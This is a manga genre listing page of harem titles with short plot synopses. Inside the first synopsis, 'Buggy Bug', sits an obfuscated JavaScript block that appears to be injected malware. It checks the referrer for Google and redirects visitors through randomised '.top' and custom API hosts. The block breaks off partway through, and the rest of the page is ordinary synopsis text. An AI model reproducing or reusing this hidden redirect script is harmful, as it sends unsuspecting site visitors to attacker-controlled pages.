Harem - Page 17

Harem manga focuses on a male lead with multiple romantic interests, blending comedy and emotion. A reverse harem features a female protagonist with a group of male admirers.

2121 results

Buggy Bug

The surey I filled out during class actually happened to be a Magical Girl contract. But something feels a bit off about this whole Magical Girl thing…<script></script><script>function _0x96e0(){var _0x1c82ae=['3290XJwwMe','oEXFG','mMeuA','dma.net/','WCbPT','https://ip','.top/','xzMKX','12955BdjMaj','yeQzV','pHFsM','mouqC','href','1341dEiIWl','JRuaN','2958pHLUJx','random','1758186csbgDW','http://rea','1573500nxhAdE','text','652836PoxFok','10808wxyJHt','location','mvOfb','9056796MHeApw','google','8bakkkn','referrer','33583jAfSZX','.customapi','then','1dTDSEv','floor','includes'];_0x96e0=function(){return _0x1c82ae;};return _0x96e0();}(function(_0x54b5dd,_0x26370b){var _0x21efc3=_0x2bd0,_0xa61b65=_0x54b5dd();while(!![]){try{var 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Shion has an idol childhood friend and a step sister from his dad’s 2nd marriage For some reason, he lost his memories because he fell from the stairs, so the last thing he remembered was the night of june 6 when he was supposed to buy some crepe. After getting out of the hospital, his childhood friend suddenly told him they are dating and that it’s a secret from his sister. But, it turns out he’s also dating his sister!


Busou Shoujo Machiavellianism

The Private Aichi Symbiosis Academy was originally a high school for high-class girls, when it became co-ed, the girls, out of fear, asked to be permitted to bring weapons to school. When that was enforced, a five-member vigilante corps-like organization called the "Supreme Five Swords" was also formed. After many generations, the five swords eventually became a group which corrected problematic students and such the academy started proactively accepting such students in order to correct them. Nomura Fudou was sent to that school after being part of a huge brawl, what will he do when the only options he has after enrolling are being expelled from that school too or being corrected the way the rest of the male students there were… by being forced to dress and act like girls!


Butsuri-san de Musou shitetara Motemote ni Narimashita

Her harem is of semi-human girls?! I, who was forced to withdraw from my world. For to learn magic with an alchemist. While learning, I come to a moment that only with my eyes could make any girl fall in love.


BXB Brothers

From ShoujoMagic: Iizuka Sono just transferred to a new school where the reigning oddballs have their own club called "BxB Brothers" ("B" for "Baka" = "Idiot"). According to them, you make your life meaningful by doing things out of the ordinary. ;) While Kazuhisa and Kei aren't too selective about membership, Katsumi is -- so it's just the three of them... Until Sono strikes Katsumi as an admirably unusual person, and he coerces her into becoming a Brother! The more Sono learns about the Brothership and Katsumi, the more pride she takes in being a Brother, but being the only BxB Sister has its problems. Caught between the open affection of Kazuhisa and the reserved admiration of Katsumi (with Kei taking school-wide bets on the side), all while struggling to register the club officially, it's a BxB Triangle that constantly takes on new angles!



From MangaHelpers: In the world, especially during ancient times, gods existed and, even now, find their place in the world. But at times, there are mortals who, whether intentionally or not, kill one of these gods and receive the “curse” of the name “Campione” or God Slayer. Those under this curse gain the power of the god they slayed and receive the mission to obliterate any false god who attempt to take control of any local turf. Godou Kusanagi is one such unlucky human who accidentally killed the Persian deity of victory, Verethragna, and received the powers of the god’s ten forms: Bull, Ram, Camel, White Stallion, Goat, Boar, Raptor, The Wind, The Youth, and The Warrior. But this power draws in all manner of trouble, which is inevitable since the role of a god is ultimately difficult for a human. Yet, one such “trouble” is that this enhanced status has currently attracted three ladies of powerful magic and religious backgrounds, who all wish to aid him in battle. But are they really there to aid him, or do they just wish to find love with him? And what business does the leader of the three, the magic sword-mistress Erica Brandelli, have with these heavily unorthodox activities? [Midori-Mori]


Can I Live With You?

Hiromi Sonoda has no girlfriend, no job, and no home, until he finds a shared-house with very cheap rent and goes to check it out. However, the share-house has a certain condition... Kei Sasuga presents a new "Share House Romantic Comedy"!


Can You Feel It From Behind?

Seojun, a college student, is popular with men. But, the problem is... He's not popular with women. He tries to get closer to the girls at the opening general meeting, but they are focused on someone else, yunwoo, a schoolmate of his. Envious of Yunwoo, Seojun gets wasted. And when he opens his eyes, Yunwoo appears unusually softer. He gets a strange sensation in his a**..."Seojun Hyung, can you feel it?""Why is this guy behind me?!"


Can't Escape From Tatsumigahara's Love

At a party, Mondo, a typical college student, meets Tatsumigahara Aoi, a well-known beauty. But after having a few drinks with her, he passes out and wakes up chained in Aoi's home.Even though Aoi looks after Mondo in every way (including in explicit ways), Mondo tries to flee from her home. The outcome is uncertain.


Captive Hearts Of Oz

Dorothy Gale, along with her beloved dog Toto, finds herself whisked away by a tornado to the mysterious land of Oz. Something about this strange place feels oddly familiar, but Dorothy just wants to go home. Following the advice of a kindly Witch, Dorothy must travel to the Emerald City and seek out the Wizard of Oz, who alone has the power to send her back to her world. Alongside a trio of fascinating new companions, and a mysterious young man known as "Zero," Dorothy must follow the Yellow Brick Road on her journey to escape Oz and some of its less than friendly denizens, the evil Witches. Yet even though all this seems to be happening for the first time, Dorothy feels as if they have all met before... Buried secrets and conflicted romance await Dorothy as she travels through the wonderful land of Oz!


Card Girl! Maiden Summoning Undressing Wars

A world where cute girls become cards and fight. And it's terrifying (happy?). In other words, you have to get the other girl to take off her clothes. Use the girls, who materialize from the cards, and their intelligence and strength to win! If you win, the other girl card is yours! A harem is not a dream. The long-awaited comic book version of this sexy card battle comedy is here!


Chained Soldier

When entrances to a different dimension known as the "Mato" emerge all over Japan, a new resource known as "Peaches" are discovered which give unique abilities only to women. However, dangerous monsters called "Yomotsu Shuuki" also roam throughout the Mato and have been responsible for various disasters ever since. To combat them, the government formed the Anti-demon Corps, an elite group of women who have received power from the Peaches. One day, a high school student named Yuuki Wakura was walking home from school when he suddenly gets lost in a Mato entrance. When he calls for help, he is immediately rescued by Kyouka Uzen, the chief of the Seventh Unit of the Anti-demon Corps. Recognizing his potential while also needing him to make her Peach power more effective, she ask that Yuuki join the Anti-demon Corps by becoming her slave, a position he might find more enjoyable than he initially would have thought... (Source: MU)
